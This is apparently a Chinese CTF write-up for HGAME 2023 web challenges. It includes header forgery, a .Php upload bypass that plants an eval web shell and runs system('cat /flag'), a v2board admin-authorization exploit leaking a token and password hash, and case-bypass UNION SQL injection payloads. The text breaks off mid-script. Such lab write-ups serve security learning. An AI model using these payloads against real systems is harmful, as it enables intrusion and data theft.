Week1

Classic Childhood Game

http://week-1.hgame.lwsec.cn:30603/Res/Events.js

// Hex-escaped (\xNN) ASCII string literal taken from Events.js. Evaluating it
// yields the Base64 text printed below; the escapes only hide the text from a
// casual reader and protect nothing that is shipped to the client.
var a = ['\x59\x55\x64\x6b\x61\x47\x4a\x58\x56\x6a\x64\x61\x62\x46\x5a\x31\x59\x6d\x35\x73\x53\x31\x6c\x59\x57\x6d\x68\x6a\x4d\x6b\x35\x35\x59\x56\x68\x43\x4d\x45\x70\x72\x57\x6a\x46\x69\x62\x54\x55\x31\x56\x46\x52\x43\x4d\x46\x6c\x56\x59\x7a\x42\x69\x56\x31\x59\x35'];

运行得到

[ 'YUdkaGJXVjdabFZ1Ym5sS1lYWmhjMk55YVhCMEprWjFibTU1VFRCMFlVYzBiV1Y5' ]

base64解码两次即可得到

hgame{fUnnyJavascript&FunnyM0taG4me}

Become A Member

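一步步来就行:逐项补全请求,下面的请求带上了指定的 User-Agent、Cookie 中的 code、Referer、X-Forwarded-For,最后提交 JSON 格式的用户名和密码。这些字段全部由客户端控制,服务端不能把它们当作身份或来源的依据。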

GET / HTTP/1.1
Host: week-1.hgame.lwsec.cn:32132
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Cute-Bunny
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=MTY3MjkzMTY3NXxEdi1CQkFFQ180SUFBUkFCRUFBQU9fLUNBQUlHYzNSeWFXNW5EQWdBQm5OdmJIWmxaQU5wYm5RRUFnQUVCbk4wY21sdVp3d05BQXRqYUdGc2JHVnVaMlZKWkFOcGJuUUVBZ0ItfEpkrqBezOGq9RBd9KmLkzyDgKVjXFwrAT9nHfmQOxAS; PHPSESSID=jpl68kvmg4r5ivdebfb84sa9k1; code=Vidar
Referer: bunnybunnybunny.com
X-Forwarded-For: 127.0.0.1
Connection: close
Content-Length: 55


{
"username":"luckytoday",
"password":"happy123"
}

得到flag

hgame{H0w_ArE_Y0u_T0day?}

Guess Who I Am

源码提示https://github.com/Potat0000/Vidar-Website/edit/master/src/scripts/config/member.js

database.json

[{
"id": "ba1van4",
"intro": "21级 / 不会Re / 不会美工 / 活在梦里 / 喜欢做不会的事情 / ◼◻粉",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=kSt5er0OQMXROy28nzTia0A&s=640",
"url": "https://ba1van4.icu"
}, {
"id": "yolande",
"intro": "21级 / 非常菜的密码手 / 很懒的摸鱼爱好者,有点呆,想学点别的但是一直开摆",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=rY328VIqDc7lNtujYic8JxA&s=640",
"url": "https://y01and3.github.io/"
}, {
"id": "t0hka",
"intro": "21级 / 日常自闭的Re手",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=EYNwm1PQe8o5OcghFb4zfw&s=640",
"url": "https://blog.t0hka.top/"
}, {
"id": "h4kuy4",
"intro": "21级 / 菜鸡pwn手 / 又菜又爱摆",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=BmACniaibVb6IL6LiaYF4Uvlw&s=640",
"url": "https://hakuya.work"
}, {
"id": "kabuto",
"intro": "21级web / cat../../../../f*",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=oPn2ez6Nq12GqPZG6cV7nw&s=640",
"url": "https://www.bilibili.com/video/BV1GJ411x7h7/"
}, {
"id": "R1esbyfe",
"intro": "21级 / 爱好歪脖 / 究极咸鱼一条 / 热爱幻想 / 喜欢窥屏水群",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=FLyUHP6nYov19gA0ia83u8Q&s=640",
"url": "https://r1esbyfe.top/"
}, {
"id": "tr0uble",
"intro": "21级 / 喜欢肝原神的密码手",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=bgcib3gBjJGdKEf7BZ512Uw&s=640",
"url": "https://clingm.top"
}, {
"id": "Roam",
"intro": "21级 / 入门级crypto",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=5wzr9TVyw2nxOz5Jb7ceaQ&s=640",
"url": "#"
}, {
"id": "Potat0",
"intro": "20级 / 摆烂网管 / DN42爱好者",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=NicTy1CDqeHsgzbZEIUU2wg&s=640",
"url": "https://potat0.cc/"
}, {
"id": "Summer",
"intro": "20级 / 歪脖手 / 想学运维 / 发呆业务爱好者",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=4y6zxTBSB3cbseeyPvQWng&s=640",
"url": "https://blog.m1dsummer.top"
}, {
"id": "chuj",
"intro": "20级 / 已退休不再参与大多数赛事 / 不好好学习,生活中就会多出许多魔法和奇迹",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=aM4tJSQSxB5gcauIMDEtUg&s=640",
"url": "https://cjovi.icu"
}, {
"id": "4nsw3r",
"intro": "20级会长 / re / 不会pwn",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=j3LOiav9IluKSYg1VEibblZw&s=640",
"url": "https://4nsw3r.top/"
}, {
"id": "4ctue",
"intro": "20级 / 可能是IOT的MISC手 / 可能是美工 / 废物晚期",
"avatar": "../../images/avatar/4ctue.jpg",
"url": "#"
}, {
"id": "0wl",
"intro": "20级 / Re手 / 菜",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=06FRYslcuprt59OxibicdhqQ&s=640",
"url": "https://0wl-alt.github.io"
}, {
"id": "At0m",
"intro": "20级 / web / 想学iot",
"avatar": "../../images/avatar/at0m.png",
"url": "https://homeboyc.cn/"
}, {
"id": "ChenMoFeiJin",
"intro": "20级 / Crypto / 摸鱼学代师",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=5xyCaLib3lovjrUzf5pWxDQ&s=640",
"url": "https://chenmofeijin.top"
}, {
"id": "Klrin",
"intro": "20级 / WEB / 菜的抠脚 / 想学GO",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=nnzEWNwxMS88jKYre5fOjg&s=640",
"url": "https://blog.mjclouds.com/"
}, {
"id": "ek1ng",
"intro": "20级 / Web / 还在努力",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=pJFuHEqNaFk1If1STvRibWw&s=640",
"url": "https://ek1ng.com"
}, {
"id": "latt1ce",
"intro": "20级 / Crypto&BlockChain / Plz V me 50 eth",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=EmPiaz7Msgg7iaia9tibibjdUyw&s=640",
"url": "https://lee-tc.github.io/"
}, {
"id": "Ac4ae0",
"intro": "*级 / 被拐卖来接盘的格子 / 不可以乱涂乱画哦",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=EI7A02PYs5WUVFP2bciad8w&s=640",
"url": "https://twitter.com/LAttic1ng"
}, {
"id": "Akira",
"intro": "19级 / 不会web / 半吊子运维 / 今天您漏油了吗",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=ku1vqyI1hLJr61PGIlic7Ow&s=640",
"url": "https://4kr.top"
}, {
"id": "qz",
"intro": "19级 / 摸鱼美工 / 学习图形学、渲染ing",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=q5qVDcvyzxee4qiays52mibA&s=640",
"url": "https://fl0.top/"
}, {
"id": "Liki4",
"intro": "19级 / 脖子笔直歪脖手",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=E3j3BJrsAfyl1arfnFKufQ&s=640",
"url": "https://github.com/Liki4"
}, {
"id": "0x4qE",
"intro": "19级 / </p><p>Web",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=K7icYial1VVzlNl7hrD9MlNw&s=640",
"url": "https://github.com/0x4qE"
}, {
"id": "xi4oyu",
"intro": "19级 / 骨瘦如柴的胖手",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=JfeMY6Lz5ZU4GmtTV85otQ&s=640",
"url": "https://www.xi4oyu.top/"
}, {
"id": "R3n0",
"intro": "19级 / bin底层选手",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=icY08gnMlXtoYIJ9ib3eJQ2g&s=640",
"url": "https://r3n0.top"
}, {
"id": "m140",
"intro": "19级 / 不会re / dl萌新 / 太弱小了,没有力量 / 想学游戏",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=zt0iccbnGuV8dOpXIYrJgvg&s=640",
"url": "#"
}, {
"id": "Mezone",
"intro": "19级 / 普通的binary爱好者。",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=rDD29iahzzg8AvQX7fdbFPg&s=640",
"url": "#"
}, {
"id": "d1gg12",
"intro": "19级 / 游戏开发 / 🐟粉",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=icawQKtjLcRiaj7scTRBZ9Qw&s=640",
"url": "https://d1g.club"
}, {
"id": "Trotsky",
"intro": "19级 / 半个全栈 / 安卓摸🐟 / P 社玩家 / 🍆粉",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=LiasEshjTXTrNzJjPHVY3Vw&s=640",
"url": "https://altonhe.github.io/"
}, {
"id": "Gamison",
"intro": "19级 / 挖坑不填的web选手",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=0VaAu2go9mvrMXu1ibmKy1g&s=640",
"url": "http://aw.gamison.top"
}, {
"id": "Tinmix",
"intro": "19级会长 / DL爱好者 / web苦手",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=L2EclrAltb7lk3LBPY6oWA&s=640",
"url": "http://poi.ac"
}, {
"id": "RT",
"intro": "19级 / Re手,我手呢?",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=p1TD1qwKfEK8NZExRDqic1A&s=640",
"url": "https://wr-web.github.io"
}, {
"id": "wenzhuan",
"intro": "18 级 / 完全不会安全 / 一个做设计的鸽子美工 / 天天画表情包",
"avatar": "../../images/avatar/wenzhuan.jpg",
"url": "https://wzyxv1n.top/"
}, {
"id": "Cosmos",
"intro": "18级 / 莫得灵魂的开发 / 茄粉 / 作豚 / 米厨",
"avatar": "../../images/avatar/cosmos.jpg",
"url": "https://cosmos.red"
}, {
"id": "Y",
"intro": "18 级 / Bin / Win / 电竞缺乏视力 / 开发太菜 / 只会 C / CSGO 白给选手",
"avatar": "../../images/avatar/Y.jpg",
"url": "https://blog.xyzz.ml:444/"
}, {
"id": "Annevi",
"intro": "18级 / 会点开发的退休web手 / 想学挖洞 / 混吃等死",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=WN9x96MpjSJ3Gc7a3SHtDw&s=640",
"url": "https://annevi.cn"
}, {
"id": "logong",
"intro": "18 级 / 求大佬带我IoT入门 / web太难了只能做做misc维持生计 / 摸🐟",
"avatar": "../../images/avatar/logong.jpg",
"url": "http://logong.vip"
}, {
"id": "Kevin",
"intro": "18 级 / Web / 车万",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=jaXAqywDMbia39e4OfGXicPQ&s=640",
"url": "https://harmless.blue/"
}, {
"id": "LurkNoi",
"intro": "18级 / 会一丢丢crypto / 摸鱼",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=CLTlN5QPS3aI60icIoxGmdQ&s=640",
"url": "#"
}, {
"id": "幼稚园",
"intro": "18级会长 / 二进制安全 / 干拉",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=G2o7mX9RCTkiaCHeEiaJLBwA&s=640",
"url": "https://danisjiang.com"
}, {
"id": "lostflower",
"intro": "18级 / 游戏引擎开发 / 尚有梦想的game maker",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=eQHtN69C2tgM8Ul8PmtTKw&s=640",
"url": "https://r000setta.github.io"
}, {
"id": "Roc826",
"intro": "18 级 / Web 底层选手",
"avatar": "../../images/avatar/Roc826.jpg",
"url": "http://www.roc826.cn/"
}, {
"id": "Seadom",
"intro": "18 级 / Web / 真·菜到超乎想象 / 拼死学(mo)习(yu)中",
"avatar": "../../images/avatar/seadom.png",
"url": "#"
}, {
"id": "ObjectNotFound",
"intro": "18级 / 懂点Web & Misc / 懂点运维 / 正在懂游戏引擎 / 我们联合!",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=yQnkF86Uy6UkZrZmFYLL4g&s=640",
"url": "https://www.zhouweitong.site"
}, {
"id": "Moesang",
"intro": "18 级 / 不擅长 Web / 擅长摸鱼 / 摸鱼!",
"avatar": "../../images/avatar/Moesang.png",
"url": "https://blog.wz22.cc"
}, {
"id": "E99p1ant",
"intro": "18级 / 囊地鼠饲养员 / 写了一个叫 Cardinal 的平台",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=AJQ9RJRCavhSibMZtRq2JOQ&s=640",
"url": "https://github.red/"
}, {
"id": "Michael",
"intro": "18 级 / Java / 会除我佬",
"avatar": "../../images/avatar/Michael.jpg",
"url": "http://michaelsblog.top/"
}, {
"id": "matrixtang",
"intro": "18级 / 编译器工程师( 伪 / 半吊子PL- 静态分析方向",
"avatar": "../../images/avatar/MATRIX.jpg",
"url": "#"
}, {
"id": "r4u",
"intro": "18级 / 不可以摸🐠哦",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=rJCqQv1EzicpDW77nMa5bYw&s=640",
"url": "http://r4u.top/"
}, {
"id": "357",
"intro": "18级 / 并不会web / 端茶送水选手",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=POaV9Y85NiaUcibaETEKTpfw&s=640",
"url": "#"
}, {
"id": "Li4n0",
"intro": "17 级 / Web 安全爱好者 / 半个程序员 / 没有女朋友",
"avatar": "../../images/avatar/li4no.jpg",
"url": "https://blog.0e1.top"
}, {
"id": "迟原静",
"intro": "17级 / Focus on Java Security",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=xyVPFvQ2dWReoBiahd7naSw&s=640",
"url": "#"
}, {
"id": "Ch1p",
"intro": "17 级 / 自称 Bin 手实际啥都不会 / 二次元安全",
"avatar": "../../images/avatar/Chip.jpg",
"url": "http://ch1p.top"
}, {
"id": "f1rry",
"intro": "17 级 / Web",
"avatar": "../../images/avatar/f1rry.png",
"url": "#"
}, {
"id": "mian",
"intro": "17 级 / 业余开发 / 专业摸鱼",
"avatar": "../../images/avatar/mian.jpg",
"url": "https://www.intmian.com"
}, {
"id": "ACce1er4t0r",
"intro": "17级 / 摸鱼ctfer / 依旧在尝试入门bin / 菜鸡研究生+1",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=gRBlwiawx1lF4UkPKh4Liczg&s=640",
"url": "#"
}, {
"id": "MiGo",
"intro": "17级 / 二战人 / 老二次元 / 兴趣驱动生活",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=XzZggL7hDeicLXb2FSic6sfg&s=640",
"url": "https://migoooo.github.io/"
}, {
"id": "BrownFly",
"intro": "17级 / RedTeamer / 字节跳动安全工程师",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=EnNslsFelj9HibuKoNHwmyg&s=640",
"url": "https://brownfly.github.io"
}, {
"id": "Aris",
"intro": "17级/ Key厨 / 腾讯玄武倒水的",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=anjeaJmx1X79Yp1DNxWrRA&s=640",
"url": "https://blog.ar1s.top"
}, {
"id": "hsiaoxychen",
"intro": "17级 / 游戏厂打工仔 / 来深圳找我快活",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=YGiaicyZ3NkWfOoGOlLPWvAw&s=640",
"url": "https://chenxy.me"
}, {
"id": "Lou00",
"intro": "17级 / web / 东南读研",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=fdAMuUicvOObMv3eZC8y0Ew&s=640",
"url": "https://blog.lou00.top"
}, {
"id": "Junier",
"intro": "16 级 / 立志学术的统计er / R / 为楼上的脱单事业做出了贡献",
"avatar": "../../images/avatar/Junier.jpg",
"url": "#"
}, {
"id": "bigmud",
"intro": "16 级会长 / Web 后端 / 会一点点 Web 安全 / 会一丢丢二进制",
"avatar": "../../images/avatar/bigmud.jpg",
"url": "#"
}, {
"id": "NeverMoes",
"intro": "16 级 / Java 福娃 / 上班 996 / 下班 669",
"avatar": "../../images/avatar/nervermoes.jpg",
"url": "#"
}, {
"id": "Sora",
"intro": "16 级 / Web Developer",
"avatar": "../../images/avatar/Sora.jpg",
"url": "https://github.com/Last-Order"
}, {
"id": "fantasyqt",
"intro": "16 级 / 可能会运维 / 摸鱼选手",
"avatar": "../../images/avatar/fantasyqt.jpg",
"url": "http://0x2f.xyz"
}, {
"id": "vvv_347",
"intro": "16 级 / Rev / Windows / Freelancer",
"avatar": "../../images/avatar/vvv_347.png",
"url": "https://vvv-347.space"
}, {
"id": "veritas501",
"intro": "16 级 / Bin / 被迫研狗",
"avatar": "../../images/avatar/veritas501.jpeg",
"url": "https://veritas501.space"
}, {
"id": "LuckyCat",
"intro": "16 级 / Web 🐱 / 现于长亭科技实习",
"avatar": "../../images/avatar/princessprincepal.jpg",
"url": "https://jianshu.com/u/ad5c1e097b84"
}, {
"id": "Ash",
"intro": "16 级 / Java 开发攻城狮 / 996 选手 / 濒临猝死",
"avatar": "../../images/avatar/ash.jpg",
"url": "#"
}, {
"id": "Cyris",
"intro": "16 级 / Web 前端 / 美工 / 阿里云搬砖",
"avatar": "https://cdn.jsdelivr.net/npm/cyris/images/avatar.png",
"url": "https://cyris.moe/"
}, {
"id": "Acaleph",
"intro": "16 级 / Web 前端 / 水母一小只 / 程序员鼓励师 / Cy 来组饥荒!",
"avatar": "../../images/avatar/Acaleph.jpg",
"url": "#"
}, {
"id": "b0lv42",
"intro": "16级 / 大果子 / 毕业1年仍在寻找vidar娘接盘侠",
"avatar": "../../images/avatar/b0lv42.jpg",
"url": "https://b0lv42.github.io/"
}, {
"id": "ngc7293",
"intro": "16 级 / 蟒蛇饲养员 / 高数小王子",
"avatar": "../../images/avatar/ngc7293.jpg",
"url": "https://ngc7292.github.io/"
}, {
"id": "ckj123",
"intro": "16 级 / Web / 菜鸡第一人",
"avatar": "../../images/avatar/ckj123.jpg",
"url": "https://www.ckj123.com"
}, {
"id": "cru5h",
"intro": "16级 / 前web手、现pwn手 / 菜鸡研究生 / scu",
"avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=5kpiaPnLZ1cWrp0G8O4qHDg&s=640",
"url": "#"
}, {
"id": "xiaoyao52110",
"intro": "16 级 / Bin 打杂 / 他们说菜都是假的,我是真的",
"avatar": "../../images/avatar/xiaoyao52110.jpg",
"url": "#"
}, {
"id": "Undefinedv",
"intro": "15 级网安协会会长 / Web 安全",
"avatar": "../../images/avatar/undefinedv.jpg",
"url": "#"
}, {
"id": "Spine",
"intro": "逆向 / 二进制安全",
"avatar": "../../images/avatar/spine.jpg",
"url": "#"
}, {
"id": "Tata",
"intro": "二进制 CGC 入门水准 / 半吊子爬虫与反爬虫",
"avatar": "../../images/avatar/tata.jpg",
"url": "#"
}, {
"id": "Airbasic",
"intro": "Web 安全 / 长亭科技安服部门 / TSRC 2015 年年度英雄榜第八、2016 年年度英雄榜第十三",
"avatar": "../../images/avatar/airbasic.jpg",
"url": "#"
}, {
"id": "jibo",
"intro": "15 级 / 什么都不会的开发 / 打什么都菜",
"avatar": "../../images/avatar/jibo.jpg",
"url": "#"
}, {
"id": "Processor",
"intro": "15 级 Vidar 会长 / 送分型逆向选手 / 13 段剑纯 / 差点没毕业 / 阿斯巴甜有点甜",
"avatar": "../../images/avatar/Processor.jpeg",
"url": "https://processor.pub/"
}, {
"id": "HeartSky",
"intro": "15 级 / 挖不到洞 / 打不动 CTF / 内网渗透不了 / 工具写不出",
"avatar": "../../images/avatar/heartsky.jpg",
"url": "http://heartsky.info"
}, {
"id": "Minygd",
"intro": "15 级 / 删库跑路熟练工 / 没事儿拍个照 / 企鹅",
"avatar": "../../images/avatar/mingy.jpg",
"url": "#"
}, {
"id": "Yotubird",
"intro": "15 级 / 已入 Python 神教",
"avatar": "../../images/avatar/Yotubird.png",
"url": "#"
}, {
"id": "c014",
"intro": "15 级 / Web 🐶 / 汪汪汪",
"avatar": "../../images/avatar/c014.png",
"url": "#"
}, {
"id": "Explorer",
"intro": "14 级 HDUISA 会长 / 二进制安全 / 曾被 NULL、TD、蓝莲花等拉去凑人数 / 差点没毕业 / 长亭安研",
"avatar": "../../images/avatar/Explorer.jpg",
"url": "#"
}, {
"id": "Aklis",
"intro": "14 级 HDUISA 副会长 / 二次元 / 拼多多安全工程师",
"avatar": "../../images/avatar/aklis.jpg",
"url": "#"
}, {
"id": "Sysorem",
"intro": "14 级网安协会会长 / HDUISA 成员 / Web 安全 / Freebuf 安全社区特约作者 / FSI2015Freebuf 特邀嘉宾",
"avatar": "../../images/avatar/sysorem.jpg",
"url": "#"
}, {
"id": "Hcamael",
"intro": "13 级 / 知道创宇 404 安全研究员 / 现在 Nu1L 划划水 / IoT、Web、二进制漏洞,密码学,区块链都看得懂一点,但啥也不会",
"avatar": "../../images/avatar/hcamael.jpg",
"url": "#"
}, {
"id": "LoRexxar",
"intro": "14 级 / Web 🐶 / 杭电江流儿 / 自走棋主教守门员",
"avatar": "../../images/avatar/lorexxar.jpg",
"url": "https://lorexxar.cn/"
}, {
"id": "A1ex",
"intro": "14 级网安协会副会长 / Web 安全",
"avatar": "../../images/avatar/alex.jpg",
"url": "#"
}, {
"id": "Ahlaman",
"intro": "14 级网安协会副会长 / 无线安全",
"avatar": "../../images/avatar/ahlaman.jpg",
"url": "#"
}, {
"id": "lightless",
"intro": "Web 安全 / 安全工程师 / 半吊子开发 / 半吊子安全研究",
"avatar": "../../images/avatar/lightless.jpg",
"url": "https://lightless.me/"
}, {
"id": "Edward_L",
"intro": "13 级 HDUISA 会长 / Web 安全 / 华为安全部门 / 二进制安全,fuzz,符号执行方向研究",
"avatar": "../../images/avatar/edward_L.jpg",
"url": "#"
}, {
"id": "逆风",
"intro": "13 级菜鸡 / 大数据打杂",
"avatar": "../../images/avatar/deadwind4.jpeg",
"url": "https://github.com/deadwind4"
}, {
"id": "陈斩仙",
"intro": "什么都不会 / 咸鱼研究生 / <del>安恒</del>、<del>长亭</del> / SJTU",
"avatar": "../../images/avatar/chenzhanxian.jpg",
"url": "https://mxgcccc4.github.io/"
}, {
"id": "Eric",
"intro": "渗透 / 人工智能 / 北师大博士在读",
"avatar": "../../images/avatar/eric.jpg",
"url": "https://3riccc.github.io"
}]

exp.py

import requests
import re
import json

# Load the member records (id / intro / avatar / url) saved as database.json.
with open("./database.json", "r", encoding="utf-8") as load_f:
    load_dict = json.load(load_f)

# Quiz API endpoints; they never change, so they are defined once up front.
question_url = 'http://week-1.hgame.lwsec.cn:30466/api/getQuestion'
verify_url = 'http://week-1.hgame.lwsec.cn:30466/api/verifyAnswer'
getscore_url = 'http://week-1.hgame.lwsec.cn:30466/api/getScore'

# One session for every request so the server-side score cookie is kept.
session = requests.session()
while True:
    # Answer submitted when no record matches the question text.
    data = {'id': ''}

    response_q = session.get(url=question_url)
    # The second double-quoted token of the response body is used as the intro
    # text (presumably the JSON value of the question field; confirm against the API).
    quoted = re.findall('".*?"', response_q.text)[1]
    intro = quoted[1:-1]  # drop the surrounding quotes

    for info in load_dict:
        if info['intro'] == intro:
            print(info['id'])
            data = {'id': info['id']}

    response = session.post(url=verify_url, data=data)
    print(response.text)
    if 'Correct' not in response.text:
        # Show the question that could not be answered, then stop.
        print(response_q.text)
        break

    response = session.get(url=getscore_url)
    print(response.text)
    # Stop once the score response contains "100".
    if '100' in response.text:
        break

成功跑完即可得到flag

hgame{Guess_who_i_am^Happy_Crawler}

Show Me Your Beauty

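Php后缀绕过:把上传文件的后缀写成大小写混合的 .Php(见下面请求里的 filename),文件仍被保存到 /img/ 下并当作 PHP 执行。防御上应使用后缀白名单并在比较前统一大小写,同时禁止上传目录解析脚本。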

POST /upload.php HTTP/1.1
Host: week-1.hgame.lwsec.cn:32057
Content-Length: 205
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryhpSA34RZsdEhzob1
Origin: http://week-1.hgame.lwsec.cn:32057
Referer: http://week-1.hgame.lwsec.cn:32057/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=MTY3MjkzMTY3NXxEdi1CQkFFQ180SUFBUkFCRUFBQU9fLUNBQUlHYzNSeWFXNW5EQWdBQm5OdmJIWmxaQU5wYm5RRUFnQUVCbk4wY21sdVp3d05BQXRqYUdGc2JHVnVaMlZKWkFOcGJuUUVBZ0ItfEpkrqBezOGq9RBd9KmLkzyDgKVjXFwrAT9nHfmQOxAS; PHPSESSID=jpl68kvmg4r5ivdebfb84sa9k1
Connection: close

------WebKitFormBoundaryhpSA34RZsdEhzob1
Content-Disposition: form-data; name="file"; filename="a.Php"
Content-Type: image/jpeg

<?php @eval($_GET['a']);?>
------WebKitFormBoundaryhpSA34RZsdEhzob1--


执行命令即可

GET /img/a.Php?a=system("cat+/flag"); HTTP/1.1
Host: week-1.hgame.lwsec.cn:32057
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=MTY3MjkzMTY3NXxEdi1CQkFFQ180SUFBUkFCRUFBQU9fLUNBQUlHYzNSeWFXNW5EQWdBQm5OdmJIWmxaQU5wYm5RRUFnQUVCbk4wY21sdVp3d05BQXRqYUdGc2JHVnVaMlZKWkFOcGJuUUVBZ0ItfEpkrqBezOGq9RBd9KmLkzyDgKVjXFwrAT9nHfmQOxAS; PHPSESSID=jpl68kvmg4r5ivdebfb84sa9k1
Connection: close


得到flag

hgame{Unsave_F1L5_SYS7em_UPL0ad!}

Week2

Git Leakage

使用GitHack扫描/.git/页面即可下载Th1s_1s-flag文件

hgame{Don't^put*Git-in_web_directory}

v2board

v2board v.1.6.1 机场面板管理接口越权漏洞

分析可参考该博文

利用工具https://github.com/zgao264/v2board-exp

_api_v1_admin_user_fetch.json中找到admintoken

{"id":1,"invite_user_id":null,"telegram_id":null,"email":"admin@example.com","password":"$2y$10$JLs3LJrKqsTly8K.w9KzI.e0Jt\/7oU9W3gQYcUDSRjg1LReimLLTS","password_algo":null,"password_salt":null,"balance":0,"discount":null,"commission_type":0,"commission_rate":null,"commission_balance":0,"t":0,"u":0,"d":0,"transfer_enable":0,"banned":0,"is_admin":1,"is_staff":0,"last_login_at":null,"last_login_ip":null,"uuid":"85a1c66e-d736-42b2-a0da-69f6fb066e90","group_id":1,"plan_id":1,"remind_expire":1,"remind_traffic":1,"token":"39d580e71705f6abac9a414def74c466","remarks":null,"expired_at":0,"created_at":1673263308,"updated_at":1673267067,"total_used":0,"plan_name":"Vidar-Team Plane\ud83d\udee9","subscribe_url":"http:\/\/week-2.hgame.lwsec.cn:31624\/api\/v1\/client\/subscribe?token=39d580e71705f6abac9a414def74c466"}],"total":4}

包裹上hgame即可

hgame{39d580e71705f6abac9a414def74c466}

Search Commodity

爆破得到密码

username:user01
password:admin123

登陆进去

search_id=1
hard disk 1

测试了下发现ban了一些字符

select and or union 空格 /**/ database =

但是大写可以绕过,因此可以直接注出来。这类关键字黑名单只是字符串匹配,挡不住注入,修复应改用参数化查询。

# 显示2 3
search_id=(-1)Union/*a*/SelEct/*a*/1,2,3
# se4rch 3
search_id=(-1)UNION/*A*/SELECT/*A*/1,DATABASE(),3
# 5ecret15here,L1st,user1nf0 3 (这里注意information里面有个or)
search_id=(-1)UNION/*A*/SELECT/*A*/1,(SELECT/*A*/GROUP_CONCAT(TABLE_NAME)FROM/*A*/INFORMATION_SCHEMA.TABLES/*A*/WHERE/*A*/TABLE_SCHEMA/*A*/LIKE/*A*/DATABASE()),3
# f14gggg1shere 3
search_id=(-1)UNION/*A*/SELECT/*A*/1,(SELECT/*A*/GROUP_CONCAT(COLUMN_NAME)FROM/*A*/INFORMATION_SCHEMA.COLUMNS/*A*/WHERE/*A*/TABLE_NAME/*A*/LIKE/*A*/"5ecret15here"),3
# hgame{4_M4n_WH0_Kn0ws_We4k-P4ssW0rd_And_SQL!} 3
search_id=(-1)UNION/*A*/SELECT/*A*/1,(SELECT/*A*/GROUP_CONCAT(f14gggg1shere)/*A*/FROM/*A*/5ecret15here),3

也可以写脚本盲注(我写的很暴力)

#encoding: utf-8
import requests
import re
import os

url = 'http://week-2.hgame.lwsec.cn:32118/search'

headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Content-Length': '11',
'Content-Type': 'application/x-www-form-urlencoded',
